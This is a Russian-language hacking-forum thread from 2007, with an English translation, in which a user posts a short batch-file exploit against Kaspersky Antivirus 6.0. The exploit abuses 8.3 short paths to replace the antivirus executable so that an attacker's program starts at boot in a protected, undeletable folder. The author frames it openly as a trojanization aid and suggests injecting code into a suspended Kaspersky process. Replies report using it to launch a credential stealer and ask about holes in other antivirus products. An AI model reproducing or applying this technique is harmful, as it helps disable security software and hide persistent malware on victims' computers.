Автозагрузку by Каспер

Discussion in 'Безопасность и Анонимность' started by hidden, 8 Jan 2007.

  1. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Автозагрузка by Каспер (Startup by Kasper)

    How to kick Kasper out, set a program for startup and make it unremovable

    Sound's like something very useful, simultaneously trivial easily. :)

    Ones I’ve installed a Kasper(Kaspersky Antivirus) for experiments, began experimenting with API hooks and found out, that Kasper hook them in the ring0, then I stopped experiments with ring0 and began experiments with something else(doesn’t metter what), but Kasper was continue annoying me by its annoying alerts, so I open task-manager and “Delete”, but it shows my “Access denied”. And I got an idea that if I’d name my program “avp.exe”, it’d become unkillable, it didn’t work. Then I decided to rename Kasper and put my program instead, but it again screaming “denied”, I couldn’t even just copy my file into its folder. So I did it a little different, code snip bellow.

    After reboot, notepad sowed up instead of Kasper but its folder was still protected, and user’s methods couldn’t delete/rename it. :)
    It’s possible by the end of your dirty job run Kasper and it’ll work like nothing happened, you can even build your own loader, that will execute Kasper suspended, inject into it, and then lat it protect itself with your code inside, It’d by not only unkillable, but unremovable and had access to the Internet ;)

    The vulnerability is, because filter file-system access in ring0 by long names to its folded, but doesn’t give a shit about FORMAT 8.3, that every windows system support :)

    When they close the hole, I’ll give another method, (2 lines longer :D ) if it’d still be working. ;)

    Sorry, English version was a little late, but not they said that not so many people using it, so I think that English version would help a little :D

    Good luck with trojanization…

    Как снести каспера, добавив свою прогу в автозагрузку, при этом сделав её не удаляемой

    Звучит очень полезно, приэтом тривиально просто. :)

    Поставил я себе каспера(для экспериментов :) ) ну и начал экспериментировать с перехватом АПИ, оказалось он их в нулевом кольце перехватывает, тогда я отложил эксперименты с нулевым кольцом и начал экспериментировать с кое-чем другим(не важно с чем), но каспер продолжал мешать, своими назойливыми окнами, ну я зашел в список процессов и делет, а он мне Эксес Денайд, я подумал почему бы не переименовать свою прогу в avp.exe, может она тоже станет не убиваемая. Не прокатило. Тогда я решил переименовать каспера и записать её на его место, а он мне опять кричит Эксес Денайд. Даже просто файл скопировать в свою папку не дал. Тогда я сделал так:
    Code:
    rem Sploit by hidden for kasper 6.0
    
    set kasper=%ProgramFiles%\KASPER~1\KASPER~1.0
    move "%kasper%\avp.exe" "%kasper%\avpx.exe"
    copy "%windir%\system32\notepad.exe" "%kasper%\avp.exe"
    При загрузке, вместо каспера стал появляться блокнот, при этом сама папка, в которой он лежит, осталась защищённая, и его из неё юзерскими методами не удалить. :)
    Можно также из своей программы по окончанию своих грязных дел запустить каспера и он заработает в своём нормальном режиме, а при большом желании можно ещё и лоадер сделать, который бы его запускал остановленым, инжектился внутрь, ресюмил бы его тред. Тогда бы он был бы не только не удалаемым, но и не убиваемым, причём с разрешением доступа в интернет ;) так что жерзайте, пока они дырачку не прикрыли :)

    Косяк весь в том, что его драйвер сидя у себя в нулевом кольце и фильтруя АПИ, на совпадение с именем своей директории, считает себя богом винды и даже не утруждает себя проверять пути в формате 8.3 :)

    Когда закроют дырачку, поделюсь другим способом(длинее на 2 строки :D ), если он всё ещё будет работать. ;)

    Удачной троянизации...
     
    #1 hidden, 8 Jan 2007
    Last edited: 3 Nov 2007
    11 people like this.
  2. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Это же надо, прошло 3 месяца, а баг всё-ещё не по фиксили, M$ и то оперативнее реагируют :)

    Если сплоит перестанет работать, плиз сообщите, чтоб я следующий выложил, просто не хочется ставить себе такую махину, чтоб узнать что они всё-ещё ничего не решили :)

    ЗЫ Неужели они не читают наш форум :)
     
    2 people like this.
  3. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    Круто, я так пинча теперь запускаю.
    Я слышал что в кьюк фаерволе есть дырка в файле feedback.exe через нее вирус на комп проползает. И скрывается от сканирования антивирусами.

    Как использовать эту багу я не знаю :mad:
     
  4. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    дядя Каспер, дядя Каспер стоп-сигнальніе огни...
     
  5. AlexI

    AlexI New Member

    Joined:
    13 Apr 2007
    Messages:
    17
    Likes Received:
    1
    Reputations:
    -1
    тока процесс полюбэ удаляется (((
     
  6. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Процесс то удаляется, зато сама папка и этот файл защищены, там-же и логи хранить можно, чтоб не удаляли :D
     
  7. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    hidden

    А случием ты не знаеш как сделать чтоб процесс нашего вируса под видом каспера не кикался??
     
  8. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Каспер включает защиту когда загружается, как вариант, запустить его остановленным, проинжектится внутрь, а потом разрешить ему включить защиту)) Но я не проверял этот вариант.
     
  9. gold-goblin

    gold-goblin Elder - Старейшина

    Joined:
    26 Mar 2007
    Messages:
    917
    Likes Received:
    174
    Reputations:
    3
    Сегодня если будет время проверю.
     
  10. Ta2i4

    Ta2i4 New Member

    Joined:
    10 Sep 2007
    Messages:
    17
    Likes Received:
    2
    Reputations:
    0
    Уже тестируется 7.0.1. В сборке 7.0.1.254 Beta еще не исправили.
     
    1 person likes this.
  11. onikishov

    onikishov Elder - Старейшина

    Joined:
    25 Mar 2007
    Messages:
    142
    Likes Received:
    74
    Reputations:
    0
    hidden, есть идеи насчет NOD32? у меня его не получается выключить в процессах, он защищен.
     
  12. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Я его не проверял, будет время, может попробую.
     
    1 person likes this.
  13. _SploiT_

    _SploiT_ Elder - Старейшина

    Joined:
    9 May 2007
    Messages:
    88
    Likes Received:
    16
    Reputations:
    1
    Очень будет кстате! Будем ждать
     
  14. radioelectron

    radioelectron New Member

    Joined:
    29 Jun 2007
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Дырочку закрыли в КИС 8. При запуске батника пишет: "В доступе отказано". Хотелось бы услышать о втором способе. :)
    И еще интересуют НОД с Доктором Вебом - есть ли в них дырки какие-нибудь? :confused:
     
  15. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    КИС 8 ??
     
    1 person likes this.
  16. radioelectron

    radioelectron New Member

    Joined:
    29 Jun 2007
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
  17. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    я бы не стал делать какие-либо выводы, опираясь на beta версию.
     
  18. radioelectron

    radioelectron New Member

    Joined:
    29 Jun 2007
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Ну не прокатывает батник с 8-кой. Пофиксили эту багу с 8.3-путями. Вот и хочется узнать о втором способе.
     
  19. Lamia

    Lamia Elder - Старейшина

    Joined:
    11 Jul 2007
    Messages:
    186
    Likes Received:
    77
    Reputations:
    -9
    А побруй сам!Уверена что там можно найти и ещё что нить интересное!
     
    1 person likes this.
  20. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Зачем обманываешь?, батник работает как часы, во всяком случае на том каспере, что по ссылке выше :)

    Это самый удобный способ, я не буду палить другой, пока не подтвердится, что этот не работает. ;)

    ХЕК Техническая сложность :D
    хттп://forum.kaspersky.com/index.php?showtopic=50136
     
    #20 hidden, 2 Nov 2007
    Last edited: 2 Nov 2007